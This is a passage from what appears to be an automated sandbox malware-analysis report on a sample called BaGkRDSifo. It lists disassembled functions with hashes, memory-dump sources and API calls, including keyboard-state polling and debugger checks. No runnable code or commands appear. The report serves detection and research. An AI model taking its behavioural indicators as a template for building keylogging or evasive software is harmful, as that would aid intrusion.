Function 0244D104 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 023a1c68e9886bf0fe3489899b6dcabc88d3000805d3808e2da054922b70309f
Instruction ID: d4d5ec178b46e0c334b90664187fe9c24c8de6868aecae55aa52bc02b530740c
Opcode Fuzzy Hash: 023a1c68e9886bf0fe3489899b6dcabc88d3000805d3808e2da054922b70309f
Instruction Fuzzy Hash: 8621F571A04244EFFB15DF10D9C4B16BBA5FB88314F24C5AEEC4A4B346CB36D886CA61

Function 0244D2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2d803e281bb462521b82dabf91e0af286c007d727bca0dc1fd52c78c89b4c0
Instruction ID: ebb77108be0a6655642c59da4973d1e145db10389c112824db31a771cdef7439
Opcode Fuzzy Hash: ae2d803e281bb462521b82dabf91e0af286c007d727bca0dc1fd52c78c89b4c0
Instruction Fuzzy Hash: 7721D775904204DFEB14DF10D5C4B16BBA5FB84318F24C56EE8494F356CB76D446CA61

Function 0244D006 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: facf2931f333883f56e5188ab091c56cfb2a5c8945a825c2afd7cb818b2995c8
Instruction ID: 4d565257762993c619e8cae1d05ee50784722e004c57e0c1d2413cfdb8240448
Opcode Fuzzy Hash: facf2931f333883f56e5188ab091c56cfb2a5c8945a825c2afd7cb818b2995c8
Instruction Fuzzy Hash: 19218E755093C0CFDB16CF20D994B16BF71EB86218F2885DBD8458B657C33AD81ACBA2

Function 0243D60B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adbf5105ac1f7104a55b3a839fbc7cfe710a0586d9cd965a1551491156f1530b
Instruction ID: d775f198d1d2f10f08a336cd7feec3575988fe2d59852b84fca6a98a41f2da39
Opcode Fuzzy Hash: adbf5105ac1f7104a55b3a839fbc7cfe710a0586d9cd965a1551491156f1530b
Instruction Fuzzy Hash: AD118176904280DFCB16CF10D6C4B1ABF71FB88714F24C5AAD9094B756C336D456CBA1

Function 0243D51F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adbf5105ac1f7104a55b3a839fbc7cfe710a0586d9cd965a1551491156f1530b
Instruction ID: 206d48e173d37dea12e1aca40ced9cabad00529e2c1b5115b83b0b0e4f7e9148
Opcode Fuzzy Hash: adbf5105ac1f7104a55b3a839fbc7cfe710a0586d9cd965a1551491156f1530b
Instruction Fuzzy Hash: BC11D376904280CFCB16CF14D5C4B16BF71FB88318F24C5AAD8090B756C336D456CBA1

Function 0244D2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77cf2a7e9c6ff2f06599da0d249c5517d9976d4f6980265ae07191becff276fa
Instruction ID: 54538a5109df5c6d8a0260f03a9563d931100a549bc936c783bab8d3fa5cda83
Opcode Fuzzy Hash: 77cf2a7e9c6ff2f06599da0d249c5517d9976d4f6980265ae07191becff276fa
Instruction Fuzzy Hash: 3C119D75904680DFDB15CF20D5C4B16BFA2FB84318F28C6AAD8494B756C37AD44ACFA1

Function 0244D0FF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77cf2a7e9c6ff2f06599da0d249c5517d9976d4f6980265ae07191becff276fa
Instruction ID: 0afbd511c5a455e9a8d73511a852f20d55a13279ed2f9742b9812f13bb69375a
Opcode Fuzzy Hash: 77cf2a7e9c6ff2f06599da0d249c5517d9976d4f6980265ae07191becff276fa
Instruction Fuzzy Hash: 54119075904244DFEB16CF10D9C4B16BBA1FB88314F28C6AADC494B756C33AD45ACB51

Function 0243D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0bf07a87b47e9c2528d2962206d744d5d253107d13ffab0f3c6c0bd4e4e025d
Instruction ID: 302748eb3bda2ea846f1d6083a4cfd411f65372c1a139ad309341f886b07d4bf
Opcode Fuzzy Hash: d0bf07a87b47e9c2528d2962206d744d5d253107d13ffab0f3c6c0bd4e4e025d
Instruction Fuzzy Hash: B601526140D3C09FD7134B258994752BFB4DF47628F1981DBD8988F2A3C2795849CB72

Function 0243D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a35b1783ecde54bdda96db3193de5891000eb773b03a795d89cfc42d74ab3be
Instruction ID: 2dd2a782c15e04da2efdc49ffae5bee46e8400d24c19f4c781b9eefb6d7fb78b
Opcode Fuzzy Hash: 3a35b1783ecde54bdda96db3193de5891000eb773b03a795d89cfc42d74ab3be
Instruction Fuzzy Hash: E101A771804340EBE7214A25CD84767BBE8DF45A28F18852BED595F282C3799942CEB5

Non-executed Functions

Function 0B33E61A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000001), ref: 0B33E675
GetKeyState.USER32(00000002), ref: 0B33E6BA
GetKeyState.USER32(00000004), ref: 0B33E6FF
GetKeyState.USER32(00000005), ref: 0B33E744
GetKeyState.USER32(00000006), ref: 0B33E789

Strings

fXV, xrefs: 0B33E63F

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: State
String ID: fXV
API String ID: 1649606143-3172339192
Opcode ID: f6565917306995a8af0ad482f7bd9a5d6c8ca69361e3232d2e7a2fb7ebec5c94
Instruction ID: 791613ccd6522d22e92b22148412d2a0a142b281d17c261552a608539d74da24
Opcode Fuzzy Hash: f6565917306995a8af0ad482f7bd9a5d6c8ca69361e3232d2e7a2fb7ebec5c94
Instruction Fuzzy Hash: 3F419C75C007958FEF21DF69C5483AFBFF0AF05708F20845AE499B6280C3795585CBA6

Function 0B33E628 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000001), ref: 0B33E675
GetKeyState.USER32(00000002), ref: 0B33E6BA
GetKeyState.USER32(00000004), ref: 0B33E6FF
GetKeyState.USER32(00000005), ref: 0B33E744
GetKeyState.USER32(00000006), ref: 0B33E789

Strings

fXV, xrefs: 0B33E63F

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: State
String ID: fXV
API String ID: 1649606143-3172339192
Opcode ID: 3a76cbe566e124e21981af8b7afe56244be1e44840608af0995015f07ae22e39
Instruction ID: 12586c27fccf3811e2618a3344dcac92b490f85dc42488e792263a04cb6f93a5
Opcode Fuzzy Hash: 3a76cbe566e124e21981af8b7afe56244be1e44840608af0995015f07ae22e39
Instruction Fuzzy Hash: BC417E75C007958EEF21DF9AC5487AFBBF4AB04708F20845AE459B6280C3789585CBA5

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 06AD6744 Relevance: 6.9, Strings: 5, Instructions: 627COMMON

Download Yara Rule

Strings

Hq, xrefs: 06AD837B
Hq, xrefs: 06AD8405
Hq, xrefs: 06AD8261
Hq, xrefs: 06AD84C3
Hq, xrefs: 06AD82F4

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq$Hq$Hq
API String ID: 0-3799487529
Opcode ID: 4341ad81eb6c79b2ff7b43158cca51606ae2f91eefe05ae0cd8599a248d66f3c
Instruction ID: 877f1d874adfb5b32630994adc368cb514e585c63c44a0f3b6dc4aa70101153a
Opcode Fuzzy Hash: 4341ad81eb6c79b2ff7b43158cca51606ae2f91eefe05ae0cd8599a248d66f3c
Instruction Fuzzy Hash: 0F326330E002189FEB54EFA5D95079EBBF2AF89300F14856AD40AAB355DF349D85CF91

Function 00408C60 Relevance: 4.1, Strings: 3, Instructions: 377COMMON

Download Yara Rule

Strings

PA, xrefs: 00408E3D
@, xrefs: 00408D03
@, xrefs: 00409092

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: @$@$PA
API String ID: 0-3039612711
Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 00407C3F Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95

Function 004073A0 Relevance: .6, Instructions: 633COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA

Function 00406CA0 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55

Function 05A30040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d66a6cafa313fbef3afa8cb9a142d99333985334ef482aa5b5b1998c3f1cda9
Instruction ID: 920d6fae24899086111875a7a3a9efab6408fb357e9939ed8617c2c414b72680
Opcode Fuzzy Hash: 9d66a6cafa313fbef3afa8cb9a142d99333985334ef482aa5b5b1998c3f1cda9
Instruction Fuzzy Hash: BC12A7F0C817458AD712CF29E94C1893BB1B741318BD64A19D2612F2E5E7B8167EEF8C

Function 06AD7C90 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cfadc2e63f950ddbbdd61343fd84aa5b9d20127e86591c9abd045ba4612acb2
Instruction ID: 5e90a01006dbb52217d6144dde895f493553ca3c9ad12cd2446f28864d4edb08
Opcode Fuzzy Hash: 7cfadc2e63f950ddbbdd61343fd84aa5b9d20127e86591c9abd045ba4612acb2
Instruction Fuzzy Hash: 22D18E31E002189FDF95EF68C98079DBBB2BF89300F15C1AAD45AAB255DB34D985CF90

Function 0A3067D9 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f4f04360465f1bc7d1fb1c26709661a46a59a03b2af81479cf38c858478aa0
Instruction ID: 0c1519043e47f289d854b764f14c4c58084b9fab0ab4bec3b9d4d0ec0d3eda09
Opcode Fuzzy Hash: 84f4f04360465f1bc7d1fb1c26709661a46a59a03b2af81479cf38c858478aa0
Instruction Fuzzy Hash: C8D1E435C2075A9ACB11EFA5D890699F7B1FF95300F10CB9AE5093B250EB70AAC5CF91

Function 05AAD8F4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 422c59839749a19cc5e82c0cb8d2cfb9cbbed80cb1a04bff55d328e2f6caf452
Instruction ID: c9f5e9edde12ec401bb9a5120eee33da9e0f02102c57e885633ea5904f11f349
Opcode Fuzzy Hash: 422c59839749a19cc5e82c0cb8d2cfb9cbbed80cb1a04bff55d328e2f6caf452
Instruction Fuzzy Hash: EBA16032F00209CFCF19DFB5C9449AEB7B2FF88300B15856AE916AB265DB31D955CB80

Function 0A3067E8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b724f26841593bdf23a6b1419e7af6f5e3ac220c8c823b346f4fbb569cce136d
Instruction ID: 3c6a579211f4da01058af73a632cc2566af08e1be4e083195062f4a7fc7b8f74
Opcode Fuzzy Hash: b724f26841593bdf23a6b1419e7af6f5e3ac220c8c823b346f4fbb569cce136d
Instruction Fuzzy Hash: 18D1E435C2075A9ACB11EFA4D890699F7B1FF95300F10CB9AE5093B210EB70AAC5CF91

Function 05A30007 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9807fed60eec27115b56764dd670586f0f22467a8cbcb539b469b3d4badd33ab
Instruction ID: 009077d6789ab130fbe93f587b996e8eb8d0aaf7978d106dcf0a9a2726bbda5c
Opcode Fuzzy Hash: 9807fed60eec27115b56764dd670586f0f22467a8cbcb539b469b3d4badd33ab
Instruction Fuzzy Hash: 37D13FB0C817458BD712CF29E8482893BB1FB45314F964A19D1616F2D1FBB8167EEF88

Function 00402B90 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688

Function 004028B0 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC

Function 024E1023 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e62c815db37fe26a07bda9e7a3f7111ca67b738b49d905baace6c28e6b5274
Instruction ID: fa267e30e0052bdd03920d65445b35db73880c5327fe4e8032f931b90fb38ea9
Opcode Fuzzy Hash: 19e62c815db37fe26a07bda9e7a3f7111ca67b738b49d905baace6c28e6b5274
Instruction Fuzzy Hash: CF517A30E003449FEB45EF37E95069A7BE3BBC8304F48C56DC0059B265DB78584A9BA5

Function 024E1030 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

